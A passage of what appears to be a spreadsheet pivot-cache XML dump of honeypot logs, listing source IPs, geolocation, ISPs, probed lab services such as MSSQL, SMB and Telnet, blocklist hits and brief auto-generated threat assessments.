(,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59193)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:1b7e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze."/>
    <m/>
  </r>
  <r>
    <x v="584"/>
    <x v="584"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:05:15"/>
    <d v="2025-03-22T06:48:20"/>
    <d v="2025-04-28T12:05:15"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef1:2be5"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="This suggests an attempt to access or exploit Microsoft SQL Server services. The &quot;NA&quot; value likely indicates that the service was not found or accessible, implying the attacker's goal was unauthorized access. The activity appears to be a reconnaissance or probing action targeting database services. &amp;&amp; The data indicates that an attempt was made to access MySQL services, likely for unauthorized purposes such as database extraction or exploitation. The user appears to be probing the system's vulnerability to MySQL-related attacks. This could be a reconnaissance step by an attacker before launching a more targeted attack."/>
    <s v="SQL Injection &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="585"/>
    <x v="585"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:48:12"/>
    <d v="2025-04-28T11:48:12"/>
    <d v="2025-04-28T11:48:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:a34f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="586"/>
    <x v="586"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:44:08"/>
    <d v="2024-09-10T20:25:00"/>
    <d v="2025-04-28T11:44:08"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9060&amp;&amp;1433&amp;&amp;63234"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits'&amp;&amp; 'unknown']}"/>
    <n v="117"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="39308"/>
    <s v="ANDISHE SABZ KHAZAR CO. P.J.S."/>
    <s v="Andishe Sabz Khazar CO. P.J.S."/>
    <s v="business"/>
    <s v="Azad university of Lahijan"/>
    <s v="2009-11-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d6d:2411"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="587"/>
    <x v="587"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:15:14"/>
    <d v="2025-04-28T11:15:14"/>
    <d v="2025-04-28T11:15:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Quận Hà Đông"/>
    <s v="Hà Đông"/>
    <s v="1581364"/>
    <s v="NA"/>
    <s v="20.9714"/>
    <s v="105.779"/>
    <s v="18403"/>
    <s v="FPT-AS-AP"/>
    <s v="FPT Telecom Company"/>
    <s v="corporate"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7116:2e51"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity reported for MySQL service, indicating potential probing or scanning attempts were unsuccessful. &amp;&amp; Possible malicious activity is an attempt to exploit MySQL database vulnerability, but it was unsuccessful as no additional data or information was provided indicating a successful connection or SQL query execution. This could be a probing attempt to identify vulnerable services. The lack of data suggests the attacker may have been deterred or the attack failed to progress further."/>
    <m/>
  </r>
  <r>
    <x v="588"/>
    <x v="588"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:11:51"/>
    <d v="2025-04-15T13:20:32"/>
    <d v="2025-04-28T11:11:51"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Jaipur"/>
    <s v="Jaipur"/>
    <s v="1269515"/>
    <s v="NA"/>
    <s v="26.9196"/>
    <s v="75.7878"/>
    <s v="134674"/>
    <s v="Tata Play Broadband Private Limited"/>
    <s v="Tata Play Broadband Private Limited"/>
    <s v="residential"/>
    <s v="Tata Play Broadband Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.89.34.165,57921)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d259:22a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An unknown device from IP address 210.89.34.165 is attempting to connect to a shared resource. This may be an attempt by an attacker to access sensitive files or gain unauthorized access. The nature of the incoming connection suggests potential malicious intent."/>
    <m/>
  </r>
  <r>
    <x v="589"/>
    <x v="589"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:06:56"/>
    <d v="2024-12-09T14:27:25"/>
    <d v="2025-04-28T11:06:56"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Bangkalan"/>
    <s v="Bangkalan"/>
    <s v="1650298"/>
    <s v="NA"/>
    <s v="-7.04754"/>
    <s v="112.736"/>
    <s v="141911"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="business"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="2021-03-23"/>
    <s v="IDNIC-DISKOMINFO-BANGKALAN-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a4:b46b"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity involves an attempt to access Microsoft SQL Server, but the operation was rejected due to insufficient information provided for successful authentication or connection. The lack of authentication details suggests a brute force attack is being attempted. This could be a precursor to unauthorized database access."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="590"/>
    <x v="590"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:04:39"/>
    <d v="2024-03-29T13:58:17"/>
    <d v="2025-04-28T11:04:39"/>
    <n v="365"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_HTTP_H37&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;37006&amp;&amp;1433&amp;&amp;389&amp;&amp;9100&amp;&amp;80&amp;&amp;5900&amp;&amp;22&amp;&amp;31717&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="01"/>
    <s v="Gīlān"/>
    <s v="Shahrestān-e Āstārā"/>
    <s v="Āstārā"/>
    <s v="142676"/>
    <s v="NA"/>
    <s v="38.3982"/>
    <s v="48.8661"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="DCI"/>
    <s v="business"/>
    <s v="Islamic Azad university of Astara, ISP Service Provider"/>
    <s v="2001-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,49263)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,49854)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60796)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,61540)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,59876)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60481)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51296)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51884)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,63440)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,64477)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,50952)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,51577)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,65178)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,55655)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,56178)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,60657)}&amp;&amp;{Data_SMB:Incoming connection (217.219.186.4,61188)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9db:ba04"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data indicates an attempt to exploit Microsoft SQL Server, possibly for unauthorized database access or data theft. The attacker may be trying to inject malicious queries or execute code remotely. This is likely a sign of a SQL injection attack."/>
    <s v="SQL Attack"/>
  </r>
  <r>
    <x v="591"/>
    <x v="591"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T11:01:38"/>
    <d v="2024-12-01T01:16:08"/>
    <d v="2025-04-28T11:01:38"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5491"/>
    <s v="77.2687"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="Abts Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa0:8c57"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="592"/>
    <x v="592"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:43:47"/>
    <d v="2023-08-13T08:24:35"/>
    <d v="2025-04-28T10:43:47"/>
    <n v="288"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;54999&amp;&amp;17819&amp;&amp;60177&amp;&amp;55810&amp;&amp;3306&amp;&amp;54297&amp;&amp;54256"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="67"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P3"/>
    <s v="Bagmati Province"/>
    <s v="Lalitpur"/>
    <s v="Patan (Jāwalākhel)"/>
    <s v="1282931"/>
    <s v="NA"/>
    <s v="27.6744"/>
    <s v="85.3123"/>
    <s v="17501"/>
    <s v="WorldLink Communications"/>
    <s v="WLIN"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2005-06-10"/>
    <s v="WLINK_WIRELESS_STATIC_IP_SUBNET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,55962)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56602)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,61791)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,62249)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56741)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,57351)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,62871)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,63347)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49388)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49951)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49962)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,53080)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,60101)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,60725)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,51341)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa6:d1e5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="593"/>
    <x v="593"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:14:26"/>
    <d v="2024-04-06T06:19:00"/>
    <d v="2025-04-28T10:14:26"/>
    <n v="309"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_NTP_H40&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;1080&amp;&amp;445&amp;&amp;389&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;123&amp;&amp;29848&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran (Behjatābād)"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7087"/>
    <s v="51.4172"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Payam Nour University"/>
    <s v="2002-07-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,60570)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,60843)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,63270)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,63903)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,65198)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,64583)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,64814)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,49803)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,54860)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50bf:6a4d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming network connection from an unknown IP address is attempting to establish communication with the SMB service, which could indicate a brute-force attack or malicious scanning activity. The IP address 80.191.106.77 and port 54860 suggest a potential attempt to exploit vulnerabilities in the SMB service. This behavior may be indicative of reconnaissance or initial steps towards an intrusion. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service, which may be a sign of a malicious port scanning or reconnaissance activity. This could be an attempt to exploit a vulnerability in the system or to gain unauthorized access. The IP address 80.191.106.77 and port 54860 are involved in this suspicious activity."/>
    <m/>
  </r>
  <r>
    <x v="594"/>
    <x v="594"/>
    <s v="223.48.221.87.dynamic.jazztel.es&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:10:43"/>
    <d v="2025-02-05T13:38:03"/>
    <d v="2025-04-28T10:10:43"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="MD"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="Pozuelo de Alarcón"/>
    <s v="3112989"/>
    <s v="28223"/>
    <s v="40.4195"/>
    <s v="-3.8014"/>
    <s v="12479"/>
